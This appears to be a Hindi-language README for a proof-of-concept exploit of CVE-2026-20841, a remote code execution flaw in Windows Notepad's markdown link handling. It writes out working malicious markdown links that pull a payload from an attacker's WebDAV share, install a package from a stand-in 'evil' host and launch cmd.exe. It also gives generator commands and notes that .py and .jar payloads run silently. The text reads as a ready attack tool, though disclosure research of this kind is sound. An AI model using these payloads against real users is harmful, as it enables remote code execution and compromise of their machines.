
CVE-2026-20841 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो मार्कडाउन लिंक के माध्यम से विंडोज नोटपैड में RCE है। यह दूरस्थ पेलोड, ऐप साइडलोडिंग, या स्थानीय बाइनरी निष्पादन को ट्रिगर करने के लिए तैयार किए गए .md फ़ाइलें उत्पन्न करता है।
विंडोज नोटपैड के मार्कडाउन रेंडरर में रिमोट कोड एक्ज़ीक्यूशन दोष के लिए PoC। मार्कडाउन इंजन URL प्रोटोकॉल को प्रतिबंधित नहीं करता है, जिससे क्लिक करने योग्य लिंक के माध्यम से मनमाने प्रोटोकॉल हैंडलर ट्रिगर किए जा सकते हैं।
file:///)[click](file:///\\attacker@5005\DavWWWRoot\payload.py)
file:/// प्रोटोकॉल रिमोट UNC पथों को हल करता है। एक पेलोड लिंक करें और विंडोज क्लिक पर उसे लाकर निष्पादित करेगा।
ms-appinstaller://)[click](ms-appinstaller://?source=https://evil/xxx.appx)
हमलावर द्वारा आपूर्ति किए गए .appx/.msix पैकेज के साथ ऐप इंस्टॉलर खोलता है।
file://)[click](file://C:/windows/system32/cmd.exe)
डिस्क पर पहले से मौजूद किसी भी निष्पादन योग्य को लॉन्च करता है — cmd.exe, powershell.exe, mshta.exe, आदि।
दोनों स्क्रिप्ट वर्तमान निर्देशिका में एक क्राफ्टेड लिंक के साथ poc.md उत्पन्न करती हैं।
node poc.js <host> <port> <payload/path>
python poc.py <host> <port> <payload/path>
# उदाहरण
node poc.js 192.168.1.100 5005 hello.py
notepad poc.md
payloads/ में परीक्षण पेलोड।
.exe, .lnk, .vbs और समान नोटपैड के व्यवहार की परवाह किए बिना विंडोज सुरक्षा चेतावनी ट्रिगर करते हैं।.py और .jar चुपचाप निष्पादित होते हैं यदि लक्ष्य पर Python या Java स्थापित है।सुरक्षित रहें!